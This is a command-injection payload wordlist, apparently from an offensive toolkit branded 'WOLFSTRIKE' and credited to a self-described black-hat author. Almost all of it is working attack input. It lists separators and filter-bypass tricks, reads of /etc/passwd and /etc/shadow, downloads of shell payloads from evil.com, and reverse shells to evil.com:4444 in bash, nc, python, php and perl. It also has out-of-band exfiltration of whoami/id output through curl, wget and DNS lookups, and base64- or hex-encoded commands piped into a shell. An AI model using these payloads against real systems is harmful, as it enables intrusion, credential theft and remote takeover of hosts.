# wordlists/command_injection.txt
# WOLFSTRIKE Command Injection Payloads
# Author: ATHEX BLACK HAT | Team: Wolf Intelligence PK
# Categories: Separators, Commands, Blind, Out-of-Band

# === COMMAND SEPARATORS ===
;
;
|
||
&
&&
`
$()
$( )
\n
%0a
%0d%0a
%0d
%0a%0d
%09
%20
%26
%7C
%3B
%60

# === LINUX COMMANDS ===
id
whoami
uname -a
hostname
pwd
ls
ls -la
ls -l /
cat /etc/passwd
cat /etc/shadow
head -n 1 /etc/passwd
tail -n 1 /etc/passwd
find / -name "*.conf"
grep -r "password" /etc/
netstat -antup
ss -antup
ps aux
ps -ef
ifconfig
ip addr
ip route
route -n
arp -a
wget http://evil.com/shell.sh
curl http://evil.com/shell.sh
nc -e /bin/sh evil.com 4444
bash -i >& /dev/tcp/evil.com/4444 0>&1
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("evil.com",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
php -r '$sock=fsockopen("evil.com",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
perl -e 'use Socket;$i="evil.com";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

# === WINDOWS COMMANDS ===
dir
type C:\Windows\win.ini
type C:\Windows\System32\drivers\etc\hosts
ipconfig /all
netstat -an
tasklist
whoami
hostname
ver
systeminfo
net user
net user administrator
net localgroup administrators
reg query HKLM\Software
dir C:\
dir C:\inetpub\wwwroot
type C:\inetpub\wwwroot\web.config
powershell -c "Invoke-WebRequest -Uri http://evil.com/shell.exe -OutFile shell.exe"

# === BLIND COMMAND INJECTION DETECTION ===
; sleep 5
| sleep 5
|| sleep 5
& sleep 5
&& sleep 5
` sleep 5 `
$( sleep 5 )
; ping -c 5 127.0.0.1
| ping -c 5 127.0.0.1
; ping -n 5 127.0.0.1
| ping -n 5 127.0.0.1

# === OUT-OF-BAND DETECTION ===
; wget http://evil.com/$(whoami)
; curl http://evil.com/$(whoami)
; nslookup $(whoami).evil.com
; dig $(whoami).evil.com
| wget http://evil.com/$(id)
| curl http://evil.com/$(id)
| nslookup $(id).evil.com
` wget http://evil.com/`whoami` `
` curl http://evil.com/`whoami` `
$(curl http://evil.com/$(whoami))
$(wget http://evil.com/$(whoami))

# === ENCODED COMMANDS ===
; echo "Y2F0IC9ldGMvcGFzc3dk" | base64 -d | bash
; python -c "import base64;exec(base64.b64decode('Y2F0IC9ldGMvcGFzc3dk'))"
; printf "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64" | sh
; echo 636174202f6574632f706173737764 | xxd -r -p | sh

# === SPACE BYPASS TECHNIQUES ===
;ls${IFS}-la
;cat${IFS}/etc/passwd
;{cat,/etc/passwd}
;cat</etc/passwd
;cat<>/etc/passwd
;ls$IFS-la
;cat$IFS/etc/passwd
;X=$'cat\x20/etc/passwd'&&$X

# === BLACKLISTED CHARACTER BYPASS ===
;cat /etc/passwd
;cat /etc/passwd
;c"at" /etc/passwd
;c'a't /etc/passwd
;c\a\t /etc/passwd
;ca$@t /etc/passwd
;who$@ami
;/bin/cat /etc/passwd
;/usr/bin/cat /etc/passwd